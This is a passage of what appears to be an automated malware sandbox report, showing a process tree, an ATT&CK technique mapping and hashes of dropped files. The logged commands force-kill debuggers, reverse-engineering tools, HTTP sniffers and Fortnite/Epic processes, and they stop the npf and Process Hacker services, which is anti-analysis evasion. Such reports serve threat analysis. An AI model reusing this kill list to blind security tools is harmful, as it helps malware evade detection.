- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1036
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2728
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4108
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2720
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4952
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2136
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2024
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:1244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1664
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:1876
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:4368
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    - Launches sc.exe
    PID:3120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2124
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:5048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3208
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:3260
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:400
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4368
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:116
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4988
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1292
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:8
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4204
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2024
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4616
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3260
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4408
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3528
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:772
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4204
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3892
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3584
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2888
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3300
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3044
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:8
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4264

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2784

C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
1⤵
PID:1228

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
1⤵
- Launches sc.exe
PID:3388

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerProSdk
1⤵
- Launches sc.exe
PID:212

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping.exe
1⤵
PID:3616

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4112

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
1⤵
PID:1312

C:\Windows\system32\taskkill.exe
taskkill /f /im FortniteClient-Win64-Shipping.exe
1⤵
PID:4556

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Windows\system32\sc.exe
sc stop KProcessHacker3
1⤵
- Launches sc.exe
PID:5004

C:\Windows\system32\sc.exe
sc stop KProcessHacker2
1⤵
- Launches sc.exe
PID:4936

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 18849e8544bf09fd3775cc1a2107b4ae KIDik4KjN0KEu4BLecsQvg.0.1.0.0.0
1⤵
PID:4688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4400

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff90a8c9758,0x7ff90a8c9768,0x7ff90a8c9778
  2⤵
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:2
  2⤵
  PID:4024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:8
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:8
  2⤵
  PID:3380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3180 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:1
  2⤵
  PID:3696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3216 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4468 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:1
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3760 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:8
  2⤵
  PID:2456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4604 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4892 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:1
  2⤵
  PID:3588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4420 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:1
  2⤵
  PID:1828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3708 --field-trial-handle=1800,i,5996600289773676868,4880174494295225935,131072 /prefetch:1
  2⤵
  PID:1444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2012

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1992

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:896

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
bab948aab646d615b0fbbb90b55433ab

SHA1
0ee46cc7db939e55dcc3a5cd17e2fb893ece7a34

SHA256
e02daa351bf7a75dc1b7e9b11c5d716b89f108058e70326f0a8b7b8ba489ce0e

SHA512
a1f82c1aba6d15216d2313673a200d1fd24f99577b06245f4e326df99ab0bd4c3c509b2ddab14753225b47f4c973ce5ac0e08c90c75430bc65c61c48a5969fed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
bab948aab646d615b0fbbb90b55433ab

SHA1
0ee46cc7db939e55dcc3a5cd17e2fb893ece7a34

SHA256
e02daa351bf7a75dc1b7e9b11c5d716b89f108058e70326f0a8b7b8ba489ce0e

SHA512
a1f82c1aba6d15216d2313673a200d1fd24f99577b06245f4e326df99ab0bd4c3c509b2ddab14753225b47f4c973ce5ac0e08c90c75430bc65c61c48a5969fed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
bab948aab646d615b0fbbb90b55433ab

SHA1
0ee46cc7db939e55dcc3a5cd17e2fb893ece7a34

SHA256
e02daa351bf7a75dc1b7e9b11c5d716b89f108058e70326f0a8b7b8ba489ce0e

SHA512
a1f82c1aba6d15216d2313673a200d1fd24f99577b06245f4e326df99ab0bd4c3c509b2ddab14753225b47f4c973ce5ac0e08c90c75430bc65c61c48a5969fed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\553c7705-6dc2-4a4d-89e8-68b78ce7d09f.tmp

Filesize
4KB

MD5
aaae2534831679c780cc15b45e654fc0

SHA1
fa1c77c2b401cd5a632170e1fcd0ac5cad6d804c

SHA256
c4d653a18190cce0ce1abed8dedc7968ef08c588a3d1f80bfbc5049a317265ac

SHA512
2ed5b47ca0ec4224197c8f920f409da6fd17c2c626a047b62938f16a844ac2659314eb396a9ab04b9ec3618b8a428a9f4255573384722ff397db96f4b0d8695a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
792B

MD5
6f10cb3840a08360d7c2cf5a1d4bfb2a

SHA1
9a3073b83e6d02ac5b91de24282b58f963da4db5

SHA256
1f26c955fa856c4a3c438d33f59bb7293d80ccfb885fbaa422d1c17c85ce4700

SHA512
aa919dc1664e0ad3699184552e8cf2027b80e8ad98037f2c269a7aa18406ca9f436986eb4d86de9d96fc1c2c01627dd2459c3fba60c0309d538a020a4113cac0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
348b05cc950dbb933b86b74dea197bbc

SHA1
2e971b9b67909021e7714d764976006bebe985c1

SHA256
6b71818002ef8ed411c4aca1a8001e50b9611dc39bc8dca3c0a1db3fa60fb348

SHA512
139d2b565a29f138a6371601b7a221a9a06e528f8ca370ff99f3a8d44c8137dce83db9bb216fcbcea43310de2c954a148ad556acc13cb5706d117529a529b242

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
8c6ea60d2d796deaa9e7b0c9334e2c4f

SHA1
1f72f3c182c3e9351783c85a7c20cca16f19c094

SHA256
b3bb8af1a4f40243f581e89184aceb36bd43a2eab7b76597270bce0723f3926d

SHA512
